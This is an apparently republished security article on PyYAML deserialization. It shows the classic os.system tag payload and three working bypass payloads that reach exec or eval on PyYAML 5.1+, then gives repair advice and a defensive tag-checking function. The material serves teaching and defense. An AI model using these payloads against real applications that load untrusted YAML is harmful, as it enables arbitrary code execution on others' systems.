2025-02-25 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how PyYAML defends against deserialization attacks and how that defense can be bypassed.
PyYAML introduction
PyYAML is one of Python's best-known modules: a YAML library for Python. Each language has its own implementation for parsing (reading and saving) the YAML format, and PyYAML is Python's. If you know anything about Python deserialization, you must have heard of it.
Historical vulnerabilities and fixes of PyYAML
Its deserialization vulnerability is still fresh in the memory of most Python security researchers.
When we exploit deserialization, we use the following payload:

    !!python/object/new:os.system ["whoami"]

PyYAML executes os.system("whoami") when this is loaded with load(). The command runs and outputs the user name.
This vulnerability was fixed in version 5.1+; if the historical payload is still used, you get an error:

    while constructing a Python instance
    expected a class, but found
      in "", line 1, column 1:
        !!python/object/new:os.system ["...
        ^
This greatly mitigates the impact of deserialization vulnerabilities because only some of the basic types can be deserialized.
PyYAML ByPass
Looking back at the basic types that can still be deserialized, we notice the Python built-in functions exec and eval. The manual describes them:
exec executes Python statements stored in strings or files and, compared with eval, can execute more complex Python code.
This leads to the following bypass payloads.
PayLoad1:
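
    import yaml

    payload = """
    - !!python/object/new:str
        args: []
        state: !!python/tuple
        - "print('vulnerability exists')"
        - !!python/object/new:staticmethod
          args: [0]
          state:
            update: !!python/name:exec
    """
    # Vulnerable call: on PyYAML 5.x, load() without Loader= uses FullLoader (and warns).
    yaml.load(payload)

Output: vulnerability exists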
PayLoad2:

    import yaml

    payload = """
    !!python/object/new:type
      args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
      listitems: "print('vulnerability exists')"
    """
    # Vulnerable call: the payload is built only from types that 5.1+ still constructs.
    yaml.load(payload)

Output: vulnerability exists
PayLoad3:

    import yaml

    payload = """
    !!python/object/new:tuple
    - !!python/object/new:map
      - !!python/name:eval
      - [ print('vulnerability exists') ]
    """
    # Vulnerable call: tuple(map(eval, [...])) forces the string to be evaluated.
    yaml.load(payload)

Output: vulnerability exists
All three payloads use the basic types that can still be deserialized to reach a code-executing function, thus bypassing the defense introduced in 5.1+.
Repair method
1. Use safe_load to load serialized content, as officially recommended.
2. Inspect the header of the file to be loaded, to prevent loading content that executes functions.
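
The two repair steps combined, as an added example that is not code from the original article. It assumes the "header" check in step 2 means inspecting the document's tags; the function names and sample documents are constructed for illustration, and SUSPECT reuses the PayLoad2 shape with its harmless print string.

```python
import yaml

PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"

# Constructed samples: a benign document, and the PayLoad2 tag shape from
# this page carrying only a harmless print string.
BENIGN = "name: demo\nports: [80, 443]\n"
SUSPECT = '''
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "print('vulnerability exists')"
'''


def python_tags(text):
    """List python/* tags in a YAML stream without constructing any object.

    yaml.parse() runs only the scanner and parser, and it reports tags in
    resolved form, so shorthand (!!python/...), verbatim (!<tag:...>) and
    %TAG-aliased spellings all compare against the same prefix.
    """
    found = []
    for event in yaml.parse(text, Loader=yaml.SafeLoader):
        tag = getattr(event, "tag", None)
        if tag and tag.startswith(PYTHON_TAG_PREFIX):
            found.append(tag)
    return found


def safe_load_rejects(text):
    """True if yaml.safe_load on its own refuses the document."""
    try:
        yaml.safe_load(text)
    except yaml.constructor.ConstructorError:
        return True
    return False


def load_untrusted(text):
    """Repair step 2 then step 1: check the tags, then safe_load."""
    tags = python_tags(text)
    if tags:
        raise ValueError("python tags in untrusted YAML: " + ", ".join(tags))
    return yaml.safe_load(text)
```

safe_load alone already refuses the document; the tag check adds a reason that can be logged and keeps the gate in place if a later change swaps the loader.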